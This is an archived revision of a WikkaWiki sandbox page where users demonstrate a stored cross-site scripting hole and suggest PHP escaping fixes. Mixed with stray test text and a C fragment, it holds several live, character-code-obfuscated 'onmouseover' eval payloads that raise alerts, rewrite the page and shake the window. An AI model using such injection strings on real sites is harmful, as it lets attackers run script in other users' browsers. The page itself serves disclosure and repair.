Revision [13528]

This is an old revision of SandBox made by 84.9.84.235 on 2006-03-17 09:59:10.

 

Test your formatting skills here


See also:

Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
Read this first
You are free to play with Wikka's FormattingRules syntax on this page. Double click anywhere to open the edit screen.
Please do not remove the main header and this paragraph while editing the page and start editing under the horizontal rule BELOW
 



yeah
Please make sure that the server has write access to a folder named uploads.


hello test
www.google.de google
WikiPedia

Testing

Dieses Leben ist eins der besten. Aber wie sind die anderen?

Testing

Testing


<include iostream>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"


typedef struct _cell {
    int id;
    int x, y;
    float min, max;
    float value;
    float step;
    char* info;
    char* format;
} cell;

http://www.qwerty.com
HomePage
mailtop:testmail@nowhere.com

"onmouseover="alert(String.fromCharCode(73,32,99,97,110,32,114,117,110,32,74,97,118,97,83,99,114,105,112,116,44,32,97,32,98,97,100,32,116,104,105,110,103))" move your mouse over this. To disallow this insert the following line into /formatters/wakka.php after line 251:
$url = htmlspecialchars($url);

For info contact me at sakaru [at] gmail [dot] com

www.yahoo.com.br yahoo sandbox

Note how one has access to anything on the page... sakaru made a good point here! Mouseover the "interesting".
"id="q" Hello
"onmouseover="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,113,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,33,33,68,65,78,71,69,82,33,33,60,47,70,79,78,84,62,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,68,73,86,34,41,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,108,97,115,116,67,104,105,108,100,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,72,79,79,87,69,69,33,33,60,47,70,79,78,84,62,34))" Interesting
"onmouseover="eval(String.fromCharCode(119,105,110,100,111,119,46,115,104,97,107,101,61,110,101,119,32,102,117,110,99,116,105,111,110,40,41,123,119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,119,105,110,100,111,119,46,115,104,97,107,101,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59,125,59,119,105,110,100,111,119,46,115,104,97,107,101,59))" Shake
"id="w"title="119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,92,34,119,92,34,41,46,116,105,116,108,101,41,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59" Hello
"onmouseover="eval(String.fromCharCode(101,118,97,108,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,119,34,41,46,116,105,116,108,101,41,41))" Testing

Another bug (which as far as I know isn't a security hole like the previous example) is shows here
This can be fixed by entering the following line after line 989 in /wikka.php
$tag = htmlentities($tag);

This can't be used to run JS because the / in the closing tag gets escaped.

Similairly wikipage/Index/<xmp> also displays the bug, but I haven't yet found where to insert the code which prevents this. If I find it I'll post back.
Valid XHTML :: Valid CSS: :: Powered by WikkaWiki